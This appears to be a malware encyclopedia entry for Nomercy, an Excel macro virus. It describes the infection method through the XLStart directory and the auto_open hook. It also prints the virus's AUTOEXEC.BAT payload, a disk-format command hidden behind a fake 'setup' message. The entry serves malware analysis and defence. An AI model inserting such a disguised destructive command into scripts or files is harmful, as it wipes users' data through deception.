Virus.MSExcel.Nomercy

Class Virus
Platform MSExcel
Description

Technical Details


This macro-virus infects Excel worksheets (XLS-files). It
contains two modules: Members and NoMercy2.


To infect Excel, the virus creates an infected NOMERCY.XLM file in
the Excel startup directory (XLStart). The virus contains auto-macro
auto_open in its NoMercy2 module, and the auto-macro sets the Fuck macro
(infection routine) on OnSheetActivate call. As a result, the virus infects
sheets that are activated. The virus detects already infected files by
the “NoMercy2” module name.


The virus erases all menu items which work with macros. On Monday after
7 a.m., the virus appends to the C:AUTOEXEC.BAT file a command that formats
the hard disk:


@ECHO OFF
CLS
ECHO Please wait while setup Updates Your configuration Files
ECHO This may take a few minutes…
FORMAT C: /U /C /S /AUTOTEST > NUL
ECHO Complete !!!
ECHO.
ECHO.
ECHO Result :
ECHO All Data Lost!!!